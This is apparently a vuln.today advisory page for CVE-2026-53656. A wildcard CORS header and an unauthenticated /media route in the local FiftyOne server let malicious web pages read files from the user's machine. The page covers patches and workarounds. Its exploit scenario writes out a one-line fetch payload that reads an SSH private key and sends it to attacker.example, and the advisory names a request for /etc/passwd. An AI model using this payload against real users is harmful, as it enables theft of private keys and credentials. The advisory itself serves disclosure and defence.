Skip to main content

FiftyOne CVE-2026-53656

MEDIUM
Origin Validation Error (CWE-346)
2026-07-15 https://github.com/voxel51/fiftyone GHSA-q78p-hj9h-5466
6.3
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
6.3 MEDIUM
AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
vuln.today AI
7.4 HIGH

Attack originates from a remote web page (AV:N); server is unauthenticated (PR:N); victim must visit a page (UI:R); read scope extends to local filesystem beyond server (S:C); arbitrary file read achievable (C:H).

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Attack Vector
Local
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
Jul 15, 2026 - 22:17 vuln.today
Analysis Generated
Jul 15, 2026 - 22:17 vuln.today
CVE Published
Jul 15, 2026 - 21:57 github-advisory
MEDIUM 6.3

DescriptionGitHub Advisory

Impact

The FiftyOne App/API server (fiftyone/server/app.py) and the /media route (fiftyone/server/routes/media.py) unconditionally set a permissive CORS header (Access-Control-Allow-Origin: *) on their responses. Because the embedded App server runs locally and is unauthenticated, this allows any website a user visits to make cross-origin requests to that user's running FiftyOne server and read the responses.

Combined with the unauthenticated /media endpoint - which serves files from the local filesystem by path - the wildcard CORS policy turns a local-only file read into a remotely exploitable, drive-by data exfiltration vulnerability. A malicious web page can silently issue requests such as http://localhost:5151/media?filepath=/etc/passwd and read arbitrary files accessible to the server process (SSH keys, cloud credentials, .env files, dataset media, etc.), then exfiltrate them to an attacker-controlled endpoint.

The victim only needs to have a FiftyOne server running locally and visit a malicious page - no clicks or other interaction are required. Browsers that have shipped Private Network Access / local-network-access protections (e.g. Chromium 142+) mitigate this for some users, but Safari and Firefox do not yet, so the attack remains viable in common configurations.

Who is impacted: any user running FiftyOne (the open-source, embedded App server) locally while also browsing the web.

Not affected: media stored in cloud buckets, which is served via signed URLs on a separate origin.

Patches

Fixed in FiftyOne 1.17.0. The hard-coded Access-Control-Allow-Origin: * has been removed and the server now responds same-origin only by default, which covers local desktop usage and the supported notebook integrations (each served through a same-origin proxy or iframe).

Cross-origin access is now opt-in via a new allowed_origins config option (environment variable FIFTYONE_ALLOWED_ORIGINS), an explicit comma-separated list of trusted origins, e.g.:

shell
export FIFTYONE_ALLOWED_ORIGINS='https://app.example.com,http://localhost:3000'

The literal value * restores the legacy wildcard behavior for users who explicitly require it and emits a warning.

Users should upgrade to FiftyOne 1.17.0 or later.

Workarounds

In affected versions there is no configuration flag to disable the wildcard CORS header without upgrading. Until you can upgrade:

  • Do not run the FiftyOne App server while browsing untrusted websites.
  • Keep the App server bound to localhost (the default) and avoid exposing it on a network interface.
  • Use a browser that enforces Private Network Access protections.

Resources

  • OWASP A01:2025 - Broken Access Control: https://owasp.org/Top10/2025/A01_2025-Broken_Access_Control/

AnalysisAI

Drive-by local filesystem exfiltration in FiftyOne versions below 1.17.0 allows any malicious website to silently read arbitrary files from a victim's machine. The FiftyOne App server unconditionally returns Access-Control-Allow-Origin: * on all responses, and the unauthenticated /media endpoint serves local filesystem files by path - together these let JavaScript on any visited webpage fetch files such as SSH keys, cloud credentials, or .env files from localhost:5151 and relay them to an attacker-controlled server. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Victim visits attacker-controlled web page
Delivery
Page JavaScript fetches http://localhost:5151/media?filepath=<target_path>
Exploit
FiftyOne wildcard CORS header permits cross-origin response read
Execution
File contents delivered to attacker page's JavaScript
Impact
Data encoded and exfiltrated to attacker-controlled server

Vulnerability AssessmentAI

Exploitation Two conditions must simultaneously hold: (1) the victim has a FiftyOne App server process actively running and bound to localhost (port 5151 by default), which is the normal operating state for any active FiftyOne user; and (2) the victim visits a malicious web page in a browser that does not enforce Private Network Access protections - specifically Safari or Firefox in any current release, or Chromium prior to version 142. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The vendor-assigned CVSS 3.1 score of 6.3 (Medium) uses AV:L, which warrants explicit scrutiny: the attack is initiated by a remote malicious web page, not by a locally-present adversary - making AV:N a more accurate characterization and raising the realistic severity to approximately 7.4 (High). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A data scientist has FiftyOne running on localhost:5151 while reviewing model outputs in Jupyter and simultaneously browsing the web. They navigate to a malicious page - such as a typosquatted PyPI documentation mirror or compromised forum - that silently executes fetch('http://localhost:5151/media?filepath=/home/user/.ssh/id_rsa').then(r=>r.text()).then(d=>fetch('https://attacker.example/collect?d='+btoa(d))). …
Remediation Upgrade to FiftyOne 1.17.0 or later via pip install --upgrade fiftyone. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2015-4495 HIGH POC
8.8 Aug 08

The PDF reader in Mozilla Firefox before 39.0.3, Firefox ESR 38.x before 38.1.1, and Firefox OS before 2.2 allows remote

CVE-2013-1690 HIGH POC
8.8 Jun 26

Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before

CVE-2013-0758 CRITICAL POC
9.3 Jan 13

Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderb

CVE-2013-0753 CRITICAL POC
9.3 Jan 13

Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox b

CVE-2012-3993 CRITICAL POC
9.3 Oct 10

The Chrome Object Wrapper (COW) implementation in Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, Thunderbi

CVE-2013-1710 CRITICAL POC
10.0 Aug 07

The crypto.generateCRMFRequest function in Mozilla Firefox before 23.0, Firefox ESR 17.x before 17.0.8, Thunderbird befo

CVE-2017-3823 HIGH POC
8.8 Feb 01

An issue was discovered in the Cisco WebEx Extension before 1.0.7 on Google Chrome, the ActiveTouch General Plugin Conta

CVE-2014-8636 HIGH POC
7.5 Jan 14

The XrayWrapper implementation in Mozilla Firefox before 35.0 and SeaMonkey before 2.32 does not properly interact with

CVE-2013-0757 CRITICAL POC
9.3 Jan 13

The Chrome Object Wrapper (COW) implementation in Mozilla Firefox before 18.0, Firefox ESR 17.x before 17.0.2, Thunderbi

CVE-2014-1510 CRITICAL POC
9.8 Mar 19

The Web IDL implementation in Mozilla Firefox before 28.0, Firefox ESR 24.x before 24.4, Thunderbird before 24.4, and Se

CVE-2014-1511 CRITICAL POC
9.8 Mar 19

Mozilla Firefox before 28.0, Firefox ESR 24.x before 24.4, Thunderbird before 24.4, and SeaMonkey before 2.25 allow remo

CVE-2013-0643 HIGH
8.8 Feb 27

The Firefox sandbox in Adobe Flash Player before 10.3.183.67 and 11.x before 11.6.602.171 on Windows and Mac OS X, and b

Share

CVE-2026-53656 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy